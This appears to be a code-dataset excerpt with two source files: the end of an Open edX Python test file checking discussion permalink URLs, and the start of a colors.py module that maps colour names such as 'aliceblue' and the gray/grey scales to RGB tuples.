('course-v1:edX+foo101+bar_t2', '99', '99'),
('course-v1:edX+foo101+bar_t2', 99, 99)
)
@ddt.unpack
def test_permalink_does_not_break_for_thread(self, course_id, discussion_id, content_id):
"""
Tests that the method does not break.
Test with permalink method for thread type of content data.
"""
url_kwargs = {'course_id': course_id, 'discussion_id': discussion_id, 'thread_id': content_id}
thread_data = {'id': content_id, 'course_id': course_id, 'commentable_id': discussion_id, 'type': 'thread'}
expected_url = reverse('single_thread', kwargs=url_kwargs)
assert utils.permalink(thread_data) == expected_url
thread_data['course_id'] = CourseKey.from_string(course_id)
assert utils.permalink(thread_data) == expected_url
@ddt.data(
('course-v1:edX+foo101+bar_t2', '99', '99'),
('course-v1:edX+foo101+bar_t2', 99, 99)
)
@ddt.unpack
def test_permalink_does_not_break_for_non_thread(self, course_id, discussion_id, thread_id):
"""
Tests that the method does not break.
Test with permalink method for non thread type of content data.
"""
url_kwargs = {'course_id': course_id, 'discussion_id': discussion_id, 'thread_id': thread_id}
thread_data = {
'id': '101', 'thread_id': thread_id, 'course_id': course_id, 'commentable_id': discussion_id, 'type': 'foo'
}
expected_url = reverse('single_thread', kwargs=url_kwargs) + '#' + thread_data['id']
assert utils.permalink(thread_data) == expected_url
thread_data['course_id'] = CourseKey.from_string(course_id)
assert utils.permalink(thread_data) == expected_url
|
stvstnfrd/edx-platform
|
lms/djangoapps/discussion/django_comment_client/tests/test_utils.py
|
Python
|
agpl-3.0
| 78,549 | 0.002928 |
#
# colors.py -- color definitions
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import re
color_dict = {
'aliceblue': (0.9411764705882353, 0.9725490196078431, 1.0),
'antiquewhite': (0.9803921568627451, 0.9215686274509803, 0.8431372549019608),
'antiquewhite1': (1.0, 0.9372549019607843, 0.8588235294117647),
'antiquewhite2': (0.9333333333333333, 0.8745098039215686, 0.8),
'antiquewhite3': (0.803921568627451, 0.7529411764705882, 0.6901960784313725),
'antiquewhite4': (0.5450980392156862,
0.5137254901960784,
0.47058823529411764),
'aquamarine': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine1': (0.4980392156862745, 1.0, 0.8313725490196079),
'aquamarine2': (0.4627450980392157, 0.9333333333333333, 0.7764705882352941),
'aquamarine3': (0.4, 0.803921568627451, 0.6666666666666666),
'aquamarine4': (0.27058823529411763, 0.5450980392156862, 0.4549019607843137),
'azure': (0.9411764705882353, 1.0, 1.0),
'azure1': (0.9411764705882353, 1.0, 1.0),
'azure2': (0.8784313725490196, 0.9333333333333333, 0.9333333333333333),
'azure3': (0.7568627450980392, 0.803921568627451, 0.803921568627451),
'azure4': (0.5137254901960784, 0.5450980392156862, 0.5450980392156862),
'beige': (0.9607843137254902, 0.9607843137254902, 0.8627450980392157),
'bisque': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque1': (1.0, 0.8941176470588236, 0.7686274509803922),
'bisque2': (0.9333333333333333, 0.8352941176470589, 0.7176470588235294),
'bisque3': (0.803921568627451, 0.7176470588235294, 0.6196078431372549),
'bisque4': (0.5450980392156862, 0.49019607843137253, 0.4196078431372549),
'black': (0.0, 0.0, 0.0),
'blanchedalmond': (1.0, 0.9215686274509803, 0.803921568627451),
'blue': (0.0, 0.0, 1.0),
'blue1': (0.0, 0.0, 1.0),
'blue2': (0.0, 0.0, 0.9333333333333333),
'blue3': (0.0, 0.0, 0.803921568627451),
'blue4': (0.0, 0.0, 0.5450980392156862),
'blueviolet': (0.5411764705882353, 0.16862745098039217, 0.8862745098039215),
'brown': (0.6470588235294118, 0.16470588235294117, 0.16470588235294117),
'brown1': (1.0, 0.25098039215686274, 0.25098039215686274),
'brown2': (0.9333333333333333, 0.23137254901960785, 0.23137254901960785),
'brown3': (0.803921568627451, 0.2, 0.2),
'brown4': (0.5450980392156862, 0.13725490196078433, 0.13725490196078433),
'burlywood': (0.8705882352941177, 0.7215686274509804, 0.5294117647058824),
'burlywood1': (1.0, 0.8274509803921568, 0.6078431372549019),
'burlywood2': (0.9333333333333333, 0.7725490196078432, 0.5686274509803921),
'burlywood3': (0.803921568627451, 0.6666666666666666, 0.49019607843137253),
'burlywood4': (0.5450980392156862, 0.45098039215686275, 0.3333333333333333),
'cadetblue': (0.37254901960784315, 0.6196078431372549, 0.6274509803921569),
'cadetblue1': (0.596078431372549, 0.9607843137254902, 1.0),
'cadetblue2': (0.5568627450980392, 0.8980392156862745, 0.9333333333333333),
'cadetblue3': (0.47843137254901963, 0.7725490196078432, 0.803921568627451),
'cadetblue4': (0.3254901960784314, 0.5254901960784314, 0.5450980392156862),
'chartreuse': (0.4980392156862745, 1.0, 0.0),
'chartreuse1': (0.4980392156862745, 1.0, 0.0),
'chartreuse2': (0.4627450980392157, 0.9333333333333333, 0.0),
'chartreuse3': (0.4, 0.803921568627451, 0.0),
'chartreuse4': (0.27058823529411763, 0.5450980392156862, 0.0),
'chocolate': (0.8235294117647058, 0.4117647058823529, 0.11764705882352941),
'chocolate1': (1.0, 0.4980392156862745, 0.1411764705882353),
'chocolate2': (0.9333333333333333, 0.4627450980392157, 0.12941176470588237),
'chocolate3': (0.803921568627451, 0.4, 0.11372549019607843),
'chocolate4': (0.5450980392156862, 0.27058823529411763, 0.07450980392156863),
'coral': (1.0, 0.4980392156862745, 0.3137254901960784),
'coral1': (1.0, 0.4470588235294118, 0.33725490196078434),
'coral2': (0.9333333333333333, 0.41568627450980394, 0.3137254901960784),
'coral3': (0.803921568627451, 0.3568627450980392, 0.27058823529411763),
'coral4': (0.5450980392156862, 0.24313725490196078, 0.1843137254901961),
'cornflowerblue': (0.39215686274509803,
0.5843137254901961,
0.9294117647058824),
'cornsilk': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk1': (1.0, 0.9725490196078431, 0.8627450980392157),
'cornsilk2': (0.9333333333333333, 0.9098039215686274, 0.803921568627451),
'cornsilk3': (0.803921568627451, 0.7843137254901961, 0.6941176470588235),
'cornsilk4': (0.5450980392156862, 0.5333333333333333, 0.47058823529411764),
'cyan': (0.0, 1.0, 1.0),
'cyan1': (0.0, 1.0, 1.0),
'cyan2': (0.0, 0.9333333333333333, 0.9333333333333333),
'cyan3': (0.0, 0.803921568627451, 0.803921568627451),
'cyan4': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkblue': (0.0, 0.0, 0.5450980392156862),
'darkcyan': (0.0, 0.5450980392156862, 0.5450980392156862),
'darkgoldenrod': (0.7215686274509804,
0.5254901960784314,
0.043137254901960784),
'darkgoldenrod1': (1.0, 0.7254901960784313, 0.058823529411764705),
'darkgoldenrod2': (0.9333333333333333,
0.6784313725490196,
0.054901960784313725),
'darkgoldenrod3': (0.803921568627451,
0.5843137254901961,
0.047058823529411764),
'darkgoldenrod4': (0.5450980392156862,
0.396078431372549,
0.03137254901960784),
'darkgray': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkgreen': (0.0, 0.39215686274509803, 0.0),
'darkgrey': (0.6627450980392157, 0.6627450980392157, 0.6627450980392157),
'darkkhaki': (0.7411764705882353, 0.7176470588235294, 0.4196078431372549),
'darkmagenta': (0.5450980392156862, 0.0, 0.5450980392156862),
'darkolivegreen': (0.3333333333333333,
0.4196078431372549,
0.1843137254901961),
'darkolivegreen1': (0.792156862745098, 1.0, 0.4392156862745098),
'darkolivegreen2': (0.7372549019607844,
0.9333333333333333,
0.40784313725490196),
'darkolivegreen3': (0.6352941176470588,
0.803921568627451,
0.35294117647058826),
'darkolivegreen4': (0.43137254901960786,
0.5450980392156862,
0.23921568627450981),
'darkorange': (1.0, 0.5490196078431373, 0.0),
'darkorange1': (1.0, 0.4980392156862745, 0.0),
'darkorange2': (0.9333333333333333, 0.4627450980392157, 0.0),
'darkorange3': (0.803921568627451, 0.4, 0.0),
'darkorange4': (0.5450980392156862, 0.27058823529411763, 0.0),
'darkorchid': (0.6, 0.19607843137254902, 0.8),
'darkorchid1': (0.7490196078431373, 0.24313725490196078, 1.0),
'darkorchid2': (0.6980392156862745, 0.22745098039215686, 0.9333333333333333),
'darkorchid3': (0.6039215686274509, 0.19607843137254902, 0.803921568627451),
'darkorchid4': (0.40784313725490196, 0.13333333333333333, 0.5450980392156862),
'darkred': (0.5450980392156862, 0.0, 0.0),
'darksalmon': (0.9137254901960784, 0.5882352941176471, 0.47843137254901963),
'darkseagreen': (0.5607843137254902, 0.7372549019607844, 0.5607843137254902),
'darkseagreen1': (0.7568627450980392, 1.0, 0.7568627450980392),
'darkseagreen2': (0.7058823529411765, 0.9333333333333333, 0.7058823529411765),
'darkseagreen3': (0.6078431372549019, 0.803921568627451, 0.6078431372549019),
'darkseagreen4': (0.4117647058823529, 0.5450980392156862, 0.4117647058823529),
'darkslateblue': (0.2823529411764706,
0.23921568627450981,
0.5450980392156862),
'darkslategray': (0.1843137254901961,
0.30980392156862746,
0.30980392156862746),
'darkslategray1': (0.592156862745098, 1.0, 1.0),
'darkslategray2': (0.5529411764705883,
0.9333333333333333,
0.9333333333333333),
'darkslategray3': (0.4745098039215686, 0.803921568627451, 0.803921568627451),
'darkslategray4': (0.3215686274509804,
0.5450980392156862,
0.5450980392156862),
'darkslategrey': (0.1843137254901961,
0.30980392156862746,
0.30980392156862746),
'darkturquoise': (0.0, 0.807843137254902, 0.8196078431372549),
'darkviolet': (0.5803921568627451, 0.0, 0.8274509803921568),
'debianred': (0.8431372549019608, 0.027450980392156862, 0.3176470588235294),
'deeppink': (1.0, 0.0784313725490196, 0.5764705882352941),
'deeppink1': (1.0, 0.0784313725490196, 0.5764705882352941),
'deeppink2': (0.9333333333333333, 0.07058823529411765, 0.5372549019607843),
'deeppink3': (0.803921568627451, 0.06274509803921569, 0.4627450980392157),
'deeppink4': (0.5450980392156862, 0.0392156862745098, 0.3137254901960784),
'deepskyblue': (0.0, 0.7490196078431373, 1.0),
'deepskyblue1': (0.0, 0.7490196078431373, 1.0),
'deepskyblue2': (0.0, 0.6980392156862745, 0.9333333333333333),
'deepskyblue3': (0.0, 0.6039215686274509, 0.803921568627451),
'deepskyblue4': (0.0, 0.40784313725490196, 0.5450980392156862),
'dimgray': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'dimgrey': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'dodgerblue': (0.11764705882352941, 0.5647058823529412, 1.0),
'dodgerblue1': (0.11764705882352941, 0.5647058823529412, 1.0),
'dodgerblue2': (0.10980392156862745, 0.5254901960784314, 0.9333333333333333),
'dodgerblue3': (0.09411764705882353, 0.4549019607843137, 0.803921568627451),
'dodgerblue4': (0.06274509803921569, 0.3058823529411765, 0.5450980392156862),
'firebrick': (0.6980392156862745, 0.13333333333333333, 0.13333333333333333),
'firebrick1': (1.0, 0.18823529411764706, 0.18823529411764706),
'firebrick2': (0.9333333333333333, 0.17254901960784313, 0.17254901960784313),
'firebrick3': (0.803921568627451, 0.14901960784313725, 0.14901960784313725),
'firebrick4': (0.5450980392156862, 0.10196078431372549, 0.10196078431372549),
'floralwhite': (1.0, 0.9803921568627451, 0.9411764705882353),
'forestgreen': (0.13333333333333333, 0.5450980392156862, 0.13333333333333333),
'gainsboro': (0.8627450980392157, 0.8627450980392157, 0.8627450980392157),
'ghostwhite': (0.9725490196078431, 0.9725490196078431, 1.0),
'gold': (1.0, 0.8431372549019608, 0.0),
'gold1': (1.0, 0.8431372549019608, 0.0),
'gold2': (0.9333333333333333, 0.788235294117647, 0.0),
'gold3': (0.803921568627451, 0.6784313725490196, 0.0),
'gold4': (0.5450980392156862, 0.4588235294117647, 0.0),
'goldenrod': (0.8549019607843137, 0.6470588235294118, 0.12549019607843137),
'goldenrod1': (1.0, 0.7568627450980392, 0.1450980392156863),
'goldenrod2': (0.9333333333333333, 0.7058823529411765, 0.13333333333333333),
'goldenrod3': (0.803921568627451, 0.6078431372549019, 0.11372549019607843),
'goldenrod4': (0.5450980392156862, 0.4117647058823529, 0.0784313725490196),
'gray': (0.7450980392156863, 0.7450980392156863, 0.7450980392156863),
'gray0': (0.0, 0.0, 0.0),
'gray1': (0.011764705882352941, 0.011764705882352941, 0.011764705882352941),
'gray10': (0.10196078431372549, 0.10196078431372549, 0.10196078431372549),
'gray100': (1.0, 1.0, 1.0),
'gray11': (0.10980392156862745, 0.10980392156862745, 0.10980392156862745),
'gray12': (0.12156862745098039, 0.12156862745098039, 0.12156862745098039),
'gray13': (0.12941176470588237, 0.12941176470588237, 0.12941176470588237),
'gray14': (0.1411764705882353, 0.1411764705882353, 0.1411764705882353),
'gray15': (0.14901960784313725, 0.14901960784313725, 0.14901960784313725),
'gray16': (0.1607843137254902, 0.1607843137254902, 0.1607843137254902),
'gray17': (0.16862745098039217, 0.16862745098039217, 0.16862745098039217),
'gray18': (0.1803921568627451, 0.1803921568627451, 0.1803921568627451),
'gray19': (0.18823529411764706, 0.18823529411764706, 0.18823529411764706),
'gray2': (0.0196078431372549, 0.0196078431372549, 0.0196078431372549),
'gray20': (0.2, 0.2, 0.2),
'gray21': (0.21176470588235294, 0.21176470588235294, 0.21176470588235294),
'gray22': (0.2196078431372549, 0.2196078431372549, 0.2196078431372549),
'gray23': (0.23137254901960785, 0.23137254901960785, 0.23137254901960785),
'gray24': (0.23921568627450981, 0.23921568627450981, 0.23921568627450981),
'gray25': (0.25098039215686274, 0.25098039215686274, 0.25098039215686274),
'gray26': (0.25882352941176473, 0.25882352941176473, 0.25882352941176473),
'gray27': (0.27058823529411763, 0.27058823529411763, 0.27058823529411763),
'gray28': (0.2784313725490196, 0.2784313725490196, 0.2784313725490196),
'gray29': (0.2901960784313726, 0.2901960784313726, 0.2901960784313726),
'gray3': (0.03137254901960784, 0.03137254901960784, 0.03137254901960784),
'gray30': (0.30196078431372547, 0.30196078431372547, 0.30196078431372547),
'gray31': (0.30980392156862746, 0.30980392156862746, 0.30980392156862746),
'gray32': (0.3215686274509804, 0.3215686274509804, 0.3215686274509804),
'gray33': (0.32941176470588235, 0.32941176470588235, 0.32941176470588235),
'gray34': (0.3411764705882353, 0.3411764705882353, 0.3411764705882353),
'gray35': (0.34901960784313724, 0.34901960784313724, 0.34901960784313724),
'gray36': (0.3607843137254902, 0.3607843137254902, 0.3607843137254902),
'gray37': (0.3686274509803922, 0.3686274509803922, 0.3686274509803922),
'gray38': (0.3803921568627451, 0.3803921568627451, 0.3803921568627451),
'gray39': (0.38823529411764707, 0.38823529411764707, 0.38823529411764707),
'gray4': (0.0392156862745098, 0.0392156862745098, 0.0392156862745098),
'gray40': (0.4, 0.4, 0.4),
'gray41': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'gray42': (0.4196078431372549, 0.4196078431372549, 0.4196078431372549),
'gray43': (0.43137254901960786, 0.43137254901960786, 0.43137254901960786),
'gray44': (0.4392156862745098, 0.4392156862745098, 0.4392156862745098),
'gray45': (0.45098039215686275, 0.45098039215686275, 0.45098039215686275),
'gray46': (0.4588235294117647, 0.4588235294117647, 0.4588235294117647),
'gray47': (0.47058823529411764, 0.47058823529411764, 0.47058823529411764),
'gray48': (0.47843137254901963, 0.47843137254901963, 0.47843137254901963),
'gray49': (0.49019607843137253, 0.49019607843137253, 0.49019607843137253),
'gray5': (0.050980392156862744, 0.050980392156862744, 0.050980392156862744),
'gray50': (0.4980392156862745, 0.4980392156862745, 0.4980392156862745),
'gray51': (0.5098039215686274, 0.5098039215686274, 0.5098039215686274),
'gray52': (0.5215686274509804, 0.5215686274509804, 0.5215686274509804),
'gray53': (0.5294117647058824, 0.5294117647058824, 0.5294117647058824),
'gray54': (0.5411764705882353, 0.5411764705882353, 0.5411764705882353),
'gray55': (0.5490196078431373, 0.5490196078431373, 0.5490196078431373),
'gray56': (0.5607843137254902, 0.5607843137254902, 0.5607843137254902),
'gray57': (0.5686274509803921, 0.5686274509803921, 0.5686274509803921),
'gray58': (0.5803921568627451, 0.5803921568627451, 0.5803921568627451),
'gray59': (0.5882352941176471, 0.5882352941176471, 0.5882352941176471),
'gray6': (0.058823529411764705, 0.058823529411764705, 0.058823529411764705),
'gray60': (0.6, 0.6, 0.6),
'gray61': (0.611764705882353, 0.611764705882353, 0.611764705882353),
'gray62': (0.6196078431372549, 0.6196078431372549, 0.6196078431372549),
'gray63': (0.6313725490196078, 0.6313725490196078, 0.6313725490196078),
'gray64': (0.6392156862745098, 0.6392156862745098, 0.6392156862745098),
'gray65': (0.6509803921568628, 0.6509803921568628, 0.6509803921568628),
'gray66': (0.6588235294117647, 0.6588235294117647, 0.6588235294117647),
'gray67': (0.6705882352941176, 0.6705882352941176, 0.6705882352941176),
'gray68': (0.6784313725490196, 0.6784313725490196, 0.6784313725490196),
'gray69': (0.6901960784313725, 0.6901960784313725, 0.6901960784313725),
'gray7': (0.07058823529411765, 0.07058823529411765, 0.07058823529411765),
'gray70': (0.7019607843137254, 0.7019607843137254, 0.7019607843137254),
'gray71': (0.7098039215686275, 0.7098039215686275, 0.7098039215686275),
'gray72': (0.7215686274509804, 0.7215686274509804, 0.7215686274509804),
'gray73': (0.7294117647058823, 0.7294117647058823, 0.7294117647058823),
'gray74': (0.7411764705882353, 0.7411764705882353, 0.7411764705882353),
'gray75': (0.7490196078431373, 0.7490196078431373, 0.7490196078431373),
'gray76': (0.7607843137254902, 0.7607843137254902, 0.7607843137254902),
'gray77': (0.7686274509803922, 0.7686274509803922, 0.7686274509803922),
'gray78': (0.7803921568627451, 0.7803921568627451, 0.7803921568627451),
'gray79': (0.788235294117647, 0.788235294117647, 0.788235294117647),
'gray8': (0.0784313725490196, 0.0784313725490196, 0.0784313725490196),
'gray80': (0.8, 0.8, 0.8),
'gray81': (0.8117647058823529, 0.8117647058823529, 0.8117647058823529),
'gray82': (0.8196078431372549, 0.8196078431372549, 0.8196078431372549),
'gray83': (0.8313725490196079, 0.8313725490196079, 0.8313725490196079),
'gray84': (0.8392156862745098, 0.8392156862745098, 0.8392156862745098),
'gray85': (0.8509803921568627, 0.8509803921568627, 0.8509803921568627),
'gray86': (0.8588235294117647, 0.8588235294117647, 0.8588235294117647),
'gray87': (0.8705882352941177, 0.8705882352941177, 0.8705882352941177),
'gray88': (0.8784313725490196, 0.8784313725490196, 0.8784313725490196),
'gray89': (0.8901960784313725, 0.8901960784313725, 0.8901960784313725),
'gray9': (0.09019607843137255, 0.09019607843137255, 0.09019607843137255),
'gray90': (0.8980392156862745, 0.8980392156862745, 0.8980392156862745),
'gray91': (0.9098039215686274, 0.9098039215686274, 0.9098039215686274),
'gray92': (0.9215686274509803, 0.9215686274509803, 0.9215686274509803),
'gray93': (0.9294117647058824, 0.9294117647058824, 0.9294117647058824),
'gray94': (0.9411764705882353, 0.9411764705882353, 0.9411764705882353),
'gray95': (0.9490196078431372, 0.9490196078431372, 0.9490196078431372),
'gray96': (0.9607843137254902, 0.9607843137254902, 0.9607843137254902),
'gray97': (0.9686274509803922, 0.9686274509803922, 0.9686274509803922),
'gray98': (0.9803921568627451, 0.9803921568627451, 0.9803921568627451),
'gray99': (0.9882352941176471, 0.9882352941176471, 0.9882352941176471),
'green': (0.0, 1.0, 0.0),
'green1': (0.0, 1.0, 0.0),
'green2': (0.0, 0.9333333333333333, 0.0),
'green3': (0.0, 0.803921568627451, 0.0),
'green4': (0.0, 0.5450980392156862, 0.0),
'greenyellow': (0.6784313725490196, 1.0, 0.1843137254901961),
'grey': (0.7450980392156863, 0.7450980392156863, 0.7450980392156863),
'grey0': (0.0, 0.0, 0.0),
'grey1': (0.011764705882352941, 0.011764705882352941, 0.011764705882352941),
'grey10': (0.10196078431372549, 0.10196078431372549, 0.10196078431372549),
'grey100': (1.0, 1.0, 1.0),
'grey11': (0.10980392156862745, 0.10980392156862745, 0.10980392156862745),
'grey12': (0.12156862745098039, 0.12156862745098039, 0.12156862745098039),
'grey13': (0.12941176470588237, 0.12941176470588237, 0.12941176470588237),
'grey14': (0.1411764705882353, 0.1411764705882353, 0.1411764705882353),
'grey15': (0.14901960784313725, 0.14901960784313725, 0.14901960784313725),
'grey16': (0.1607843137254902, 0.1607843137254902, 0.1607843137254902),
'grey17': (0.16862745098039217, 0.16862745098039217, 0.16862745098039217),
'grey18': (0.1803921568627451, 0.1803921568627451, 0.1803921568627451),
'grey19': (0.18823529411764706, 0.18823529411764706, 0.18823529411764706),
'grey2': (0.0196078431372549, 0.0196078431372549, 0.0196078431372549),
'grey20': (0.2, 0.2, 0.2),
'grey21': (0.21176470588235294, 0.21176470588235294, 0.21176470588235294),
'grey22': (0.2196078431372549, 0.2196078431372549, 0.2196078431372549),
'grey23': (0.23137254901960785, 0.23137254901960785, 0.23137254901960785),
'grey24': (0.23921568627450981, 0.23921568627450981, 0.23921568627450981),
'grey25': (0.25098039215686274, 0.25098039215686274, 0.25098039215686274),
'grey26': (0.25882352941176473, 0.25882352941176473, 0.25882352941176473),
'grey27': (0.27058823529411763, 0.27058823529411763, 0.27058823529411763),
'grey28': (0.2784313725490196, 0.2784313725490196, 0.2784313725490196),
'grey29': (0.2901960784313726, 0.2901960784313726, 0.2901960784313726),
'grey3': (0.03137254901960784, 0.03137254901960784, 0.03137254901960784),
'grey30': (0.30196078431372547, 0.30196078431372547, 0.30196078431372547),
'grey31': (0.30980392156862746, 0.30980392156862746, 0.30980392156862746),
'grey32': (0.3215686274509804, 0.3215686274509804, 0.3215686274509804),
'grey33': (0.32941176470588235, 0.32941176470588235, 0.32941176470588235),
'grey34': (0.3411764705882353, 0.3411764705882353, 0.3411764705882353),
'grey35': (0.34901960784313724, 0.34901960784313724, 0.34901960784313724),
'grey36': (0.3607843137254902, 0.3607843137254902, 0.3607843137254902),
'grey37': (0.3686274509803922, 0.3686274509803922, 0.3686274509803922),
'grey38': (0.3803921568627451, 0.3803921568627451, 0.3803921568627451),
'grey39': (0.38823529411764707, 0.38823529411764707, 0.38823529411764707),
'grey4': (0.0392156862745098, 0.0392156862745098, 0.0392156862745098),
'grey40': (0.4, 0.4, 0.4),
'grey41': (0.4117647058823529, 0.4117647058823529, 0.4117647058823529),
'grey42': (0.4196078431372549, 0.4196078431372549, 0.4196078431372549),
'grey43': (0.43137254901960786, 0.43137254901960786, 0.43137254901960786),
'grey44': (0.4392156862745098, 0.4392156862745098, 0.4392156862745098),
'grey45': (0.45098039215686275, 0.45098039215686275, 0.45098039215686275),
'grey46': (0.4588235294117647, 0.4588235294117647, 0.4588235294117647),
'grey47': (0.47058823529411764, 0.47058823529411764, 0.47058823529411764),
'grey48': (0.47843137254901963, 0.47843137254901963, 0.47843137254901963),
'grey49': (0.49019607843137253, 0.49019607843137253, 0.49019607843137253),
'grey5': (0.050980392156862744, 0.050980392156862744, 0.050980392156862744),
'grey50': (0.4980392156862745, 0.4980392156862745, 0.4980392156862745),
'grey51': (0.5098039215686274, 0.5098039215686274, 0.5098039215686274),
'grey52': (0.5215686274509804, 0.5215686274509804, 0.5215686274509804),
'grey53': (0.5294117647058824, 0.5294117647058824, 0.5294117647058824),
'grey54': (0.5411764705882353, 0.5411764705882353, 0.5411764705882353),
'grey55': (0.5490196078431373, 0.5490196078431373, 0.5490196078431373),
'grey56': (0.5607843137254902, 0.5607843137254902, 0.5607843137254902),
'grey57': (0.5686274509803921, 0.5686274509803921, 0.5686274509803921),
'grey58': (0.5803921568627451, 0.5803921568627451, 0.5803921568627451),
'grey59': (0.5882352941176471, 0.5882352941176471, 0.5882352941176471),
'grey6': (0.058823529411764705, 0.058823529411764705, 0.058823529411764705),
'grey60': (0.6, 0.6, 0.6),
'grey61': (0.611764705882353, 0.611764705882353, 0.611764705882353),
'grey62': (0.6196078431372549, 0.6196078431372549, 0.6196078431372549),
'grey63': (0.6313725490196078, 0.6313725490196078, 0.6313725490196078),
'grey64': (0.6392156862745098, 0.6392156862745098, 0.6392156862745098),
'grey65': (0.6509803921568628, 0.6509803921568628, 0.6509803921568628),
'grey66': (0.6588235294117647, 0.6588235294117647, 0.6588235294117647),
'grey67': (0.6705882352941176, 0.6705882352941176, 0.6705882352941176),
'grey68': (0.6784313725490196, 0.6784313725490196, 0.6784313725490196),
'grey69': (0.6901960784313725, 0.6901960784313725, 0.6901960784313725),
'grey7': (0.07058823529411765, 0.07058823529411765, 0.07058823529411765),
'grey70': (0.7019607843137254, 0.7019607843137254, 0.7019607843137254),
'grey71': (0.7098039215686275, 0.7098039215686275, 0.7098039215686275),
'grey72': (0.7215686274509804, 0.7215686274509804, 0.7215686274509804),
'grey73': (0.7294117647058823, 0.7294117647058823, 0.7294117647058823),
'grey74': (0.7411764705882353, 0.7411764705882353, 0.7411764705882353),
'grey75': (0.7490196078431373, 0.7490196078431373, 0.7490196078431373),
'grey76': (0.7607843137254902, 0.7607843137254902, 0.7607843137254902),
'grey77': (0.7686274509803922, 0.7686274509803922, 0.7686274509803922),
'grey78': (0.7803921568627451, 0.7803921568627451, 0.7803921568627451),
'grey79': (0.788235294117647, 0.788235294117647, 0.788235294117647),
'grey8': (0.0784313725490196, 0.0784313725490196, 0.0784313725490196),
'grey80': (0.8, 0.8, 0.8),
'grey81': (0.8117647058823529, 0.8117647058823529, 0.8117647058823529),
'grey82': (0.8196078431372549, 0.8196078431372549, 0.8196078431372549),
'grey83': (0.8313725490196079, 0.8313725490196079, 0.8313725490196079),
'grey84': (0.8392156862745098, 0.8392156862745098, 0.8392156862745098),
'grey85': (0.8509803921568627, 0.8509803921568627, 0.8509803921568627),
'grey86': (0.8588235294117647, 0.8588235294117647, 0.8588235294117647),
'grey87': (0.8705882352941177, 0.8705882352941177, 0.8705882352941177),
'grey88': (0.8784313725490196, 0.8784313725490196, 0.8784313725490196),
'grey89': (0.8901960784313725, 0.8901960784313725, 0.8901960784313725),
'grey9': (0.09019607843137255, 0.09019607843137255, 0.09019607843137255),
'grey90': (0.8980392156862745, 0.8980392156862745, 0.8980392156862745),
'grey91': (0.9098039215686274, 0.9098039215686274, 0.9098039215686274),
'grey92': (0.9215686274509803, 0.9215686274509803, 0.9215686274509803),
'grey93': (0.9294117647058824, 0.9294117647058824, 0.9294117647058824),
'grey94': (0.9411764705882353, 0.9411764705882353, 0.9411764705882353),
'grey95': (0.9490196078431372, 0.9490196078431372, 0.9490196078431372),
'grey96': (0.9607843137254902, 0.9607843137254902, 0.9607843137254902),
'grey97': (0.9686274509803922, 0.9686274509803922, 0.9686274509803922),
'grey98': (0.9803921568627451, 0.9803921568627451, 0.9803921568627451),
'grey99': (0.9882352941176471, 0.9882352941176471, 0.9882352941176471),
'honeydew': (0.9411764705882353, 1.0, 0.9411764705882353),
'honeydew1': (0.9411764705882353, 1.0, 0.9411764705882353),
'honeydew2': (0.8784313725490196, 0.9333333333333333, 0.8784313725490196),
'honeydew3': (0.7568627450980392, 0.803921568627451, 0.7568627450980392),
'honeydew4': (0.5137254901960784, 0.5450980392156862, 0.5137254901960784),
'hotpink': (1.0, 0.4117647058823529, 0.7058823529411765),
'hotpink1': (1.0, 0.43137254901960786, 0.7058823529411765),
'hotpink2': (0.9333333333333333, 0.41568627450980394, 0.6549019607843137),
'hotpink3': (0.803921568627451, 0.3764705882352941, 0.5647058823529412),
'hotpink4': (0.5450980392156862, 0.22745098039215686, 0.3843137254901961),
'indianred': (0.803921568627451, 0.3607843137254902, 0.3607843137254902),
'indianred1': (1.0, 0.41568627450980394, 0.41568627450980394),
'indianred2': (0.9333333333333333, 0.38823529411764707, 0.38823529411764707),
'indianred3': (0.803921568627451, 0.3333333333333333, 0.3333333333333333),
'indianred4': (0.5450980392156862, 0.22745098039215686, 0.22745098039215686),
'ivory': (1.0, 1.0, 0.9411764705882353),
'ivory1': (1.0, 1.0, 0.9411764705882353),
'ivory2': (0.9333333333333333, 0.9333333333333333, 0.8784313725490196),
'ivory3': (0.803921568627451, 0.803921568627451, 0.7568627450980392),
'ivory4': (0.5450980392156862, 0.5450980392156862, 0.5137254901960784),
'khaki': (0.9411764705882353, 0.9019607843137255, 0.5490196078431373),
'khaki1': (1.0, 0.9647058823529412, 0.5607843137254902),
'khaki2': (0.9333333333333333, 0.9019607843137255, 0.5215686274509804),
'khaki3': (0.803921568627451, 0.7764705882352941, 0.45098039215686275),
'khaki4': (0.5450980392156862, 0.5254901960784314, 0.3058823529411765),
'lavender': (0.9019607843137255, 0.9019607843137255, 0.9803921568627451),
'lavenderblush': (1.0, 0.9411764705882353, 0.9607843137254902),
'lavenderblush1': (1.0, 0.9411764705882353, 0.9607843137254902),
'lavenderblush2': (0.9333333333333333,
0.8784313725490196,
0.8980392156862745),
'lavenderblush3': (0.803921568627451, 0.7568627450980392, 0.7725490196078432),
'lavenderblush4': (0.5450980392156862,
0.5137254901960784,
0.5254901960784314),
'lawngreen': (0.48627450980392156, 0.9882352941176471, 0.0),
'lemonchiffon': (1.0, 0.9803921568627451, 0.803921568627451),
'lemonchiffon1': (1.0, 0.9803921568627451, 0.803921568627451),
'lemonchiffon2': (0.9333333333333333, 0.9137254901960784, 0.7490196078431373),
'lemonchiffon3': (0.803921568627451, 0.788235294117647, 0.6470588235294118),
'lemonchiffon4': (0.5450980392156862, 0.5372549019607843, 0.4392156862745098),
'lightblue': (0.6784313725490196, 0.8470588235294118, 0.9019607843137255),
'lightblue1': (0.7490196078431373, 0.9372549019607843, 1.0),
'lightblue2': (0.6980392156862745, 0.8745098039215686, 0.9333333333333333),
'lightblue3': (0.6039215686274509, 0.7529411764705882, 0.803921568627451),
'lightblue4': (0.40784313725490196, 0.5137254901960784, 0.5450980392156862),
'lightcoral': (0.9411764705882353, 0.5019607843137255, 0.5019607843137255),
'lightcyan': (0.8784313725490196, 1.0, 1.0),
'lightcyan1': (0.8784313725490196, 1.0, 1.0),
'lightcyan2': (0.8196078431372549, 0.9333333333333333, 0.9333333333333333),
